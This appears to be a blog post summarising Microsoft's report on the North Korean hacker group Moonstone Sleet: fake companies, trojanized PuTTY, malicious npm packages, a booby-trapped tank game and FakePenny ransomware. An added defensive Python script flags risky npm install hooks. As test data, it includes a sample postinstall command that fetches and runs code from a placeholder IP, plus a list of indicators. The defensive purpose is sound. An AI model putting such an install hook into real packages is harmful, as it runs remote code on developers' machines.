Microsoft just dug up some intriguing intel on a new North Korean hacker bunch. They’re calling them Moonstone Sleet. Quite the catchy name, right? Anyway, this sneaky group has been wreaking havoc with cyber attacks all over the map. And they’re not picky—they’re going after everyone from software and IT folks to educators and defence peeps.
What’s their weapon of choice, you ask? Oh, the usual suspects like ransomware and some nasty bespoke malware that has ties to the notorious Lazarus Group.
Here’s a tidbit I found fascinating. Microsoft’s Threat Intelligence gurus did a deep dive and laid out what Moonstone Sleet has been up to. Brace yourself: these hackers are setting up fake companies and bogus job offers! I mean, who does that? It’s like catfishing, but for cybersecurity.
Not stopping there, they’re getting even craftier: using trojanized versions of legit tools, whipping up malicious games, and spreading fresh custom ransomware around like confetti on New Year’s Eve.
They’ve got this uncanny knack for blending old-school hacking tricks with some pretty unique strategies of their own. These guys are mixing it up in ways that would make any techie shake in their boots.
Initially tracked under the name Storm-1789, Moonstone Sleet is considered a state-aligned group with strong tactical overlaps with the Lazarus Group, also known as Diamond Sleet. However, the group has since developed a distinct identity of its own through separate infrastructure and tradecraft.
The similarities with Lazarus include reusing known malware such as Comebacker, first seen in January 2021 targeting security researchers. Lazarus used Comebacker as recently as February, embedding it within seemingly harmless Python and npm packages to establish contact with command-and-control servers.
To support their diverse goals, Moonstone Sleet also pursues employment in software development positions at legitimate companies. This likely aims to generate illicit revenue for the sanctions-hit country or gain covert access to organisations.
Attack chains observed in August 2023 involved using a modified version of PuTTY, a tactic adopted by Lazarus in late 2022 as part of Operation Dream Job.
This method involved using LinkedIn, Telegram, and developer freelancing platforms to send targets a .ZIP archive containing a trojanized version of putty.exe and a text file with an IP address and a password. When the provided IP and password were entered into PuTTY, it decrypted and executed an embedded payload.
Another attack sequence involved malicious npm packages delivered through LinkedIn or freelancing websites, masquerading as a fake company to send .ZIP files containing a harmful npm package under the guise of a technical skills assessment.
These packages connected to an actor-controlled IP address and dropped payloads similar to SplitLoader or facilitated credential theft from the Windows Local Security Authority Subsystem Service (LSASS) process.
The targeting of npm developers using counterfeit packages has been associated with a campaign previously documented by Palo Alto Networks Unit 42, named Contagious Interview (also known as DEV#POPPER).
Microsoft tracks this activity under the name Storm-1877. Rogue npm packages have also been a malware delivery vector for another North Korean-linked group, Jade Sleet (aka TraderTraitor and UNC4899), implicated in the JumpCloud hack last year.
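An added example (not from Microsoft’s report or this post) of the kind of check a defender can run before installing an unsolicited “skills assessment” package like the ones described above: it parses package.json and flags install-time lifecycle hooks that reach out to a raw IP address or run inline code. The sample package.json files and the indicator list are constructed for illustration.

```python
import json
import re

# Lifecycle hooks npm runs automatically during `npm install`; a malicious
# "assessment" package can execute code here before anyone reads the source.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Indicators worth flagging in an install-time script (constructed list).
PATTERNS = {
    "raw-ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "remote-fetch": re.compile(r"\b(?:curl|wget|Invoke-WebRequest)\b|https?://"),
    "inline-node": re.compile(r"\bnode\s+-e\b"),
    "eval-or-decode": re.compile(r"\b(?:eval|Function|atob|base64)\b"),
}

def triage_package_json(text):
    """Return (hook, indicator, script) findings for the given package.json text."""
    pkg = json.loads(text)
    scripts = pkg.get("scripts", {})
    findings = []
    for hook in LIFECYCLE_HOOKS:
        script = scripts.get(hook)
        if not script:
            continue
        for name, rx in PATTERNS.items():
            if rx.search(script):
                findings.append((hook, name, script))
    return findings

# Constructed sample: a "technical assessment" package whose postinstall hook
# pulls a second stage from a hard-coded IP (TEST-NET-3 address, not a real one).
SUSPICIOUS = json.dumps({
    "name": "skills-assessment",
    "version": "1.0.0",
    "scripts": {
        "test": "jest",
        "postinstall": "node -e \"require('http').get('http://203.0.113.10/s.js')\"",
    },
})

# Constructed benign package: only a test script, nothing runs at install time.
BENIGN = json.dumps({"name": "widget", "version": "2.1.0", "scripts": {"test": "mocha"}})

if __name__ == "__main__":
    for hook, name, script in triage_package_json(SUSPICIOUS):
        print(f"[{hook}] {name}: {script}")
    print("benign findings:", triage_package_json(BENIGN))
```

A clean result does not prove a package is safe (the payload may live in the module code itself), but a hit on an install hook is reason enough to refuse to run `npm install` on it.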
Since February 2024, Microsoft has detected attacks involving a malicious tank game called DeTankWar. Distributed via email or messaging platforms, the game appears legitimate, with fake websites and accounts on social media.
Moonstone Sleet typically approaches targets through messaging platforms or email, presenting itself as a game developer seeking investment or developer support, often masquerading as a legitimate blockchain company or using fake companies.
For example, Moonstone Sleet used a fake company called C.C. Waterfall to contact targets, presenting the game as a blockchain-related project and offering collaboration opportunities.
The email included a link to download the game, which came with a malware loader referred to as YouieLoad. This loader can deploy next-stage payloads, create malicious services, and collect browser data.
Another fake company, StarGlow Ventures, was created for social engineering campaigns, complete with a custom domain, fake employee personas, and social media accounts. StarGlow Ventures masqueraded as a legitimate software development company to reach out to prospective targets for collaboration on web apps, mobile apps, blockchain, and AI projects.
The campaign, running from January to April 2024, involved email messages embedded with a tracking pixel to determine recipient engagement for future revenue generation opportunities.
The latest tool in Moonstone Sleet’s arsenal is a custom ransomware variant called FakePenny. This ransomware was deployed against an unnamed defence technology company in April 2024, demanding a $6.6 million ransom in Bitcoin.
The use of ransomware is reminiscent of tactics used by Andariel (aka Onyx Sleet), a sub-group within the Lazarus umbrella known for ransomware families like H0lyGh0st and Maui.
To defend against attacks by Moonstone Sleet, Microsoft urges software companies to stay vigilant for supply chain attacks, as North Korean threat actors frequently poison the software supply chain to conduct widespread malicious operations. Moonstone Sleet’s diverse set of tactics is notable both for its effectiveness and for how it has evolved, over many years, out of the tradecraft of other North Korean threat actors to meet the regime’s cyber objectives.
This disclosure comes as South Korea recently accused North Korea, particularly the Lazarus Group, of stealing 1,014 gigabytes of data and documents, including names, resident registration numbers, and financial records, from a court network between January 7, 2021, and February 9, 2023, as reported by Korea JoongAng Daily. This further emphasises the persistent threat posed by North Korean cyber activities.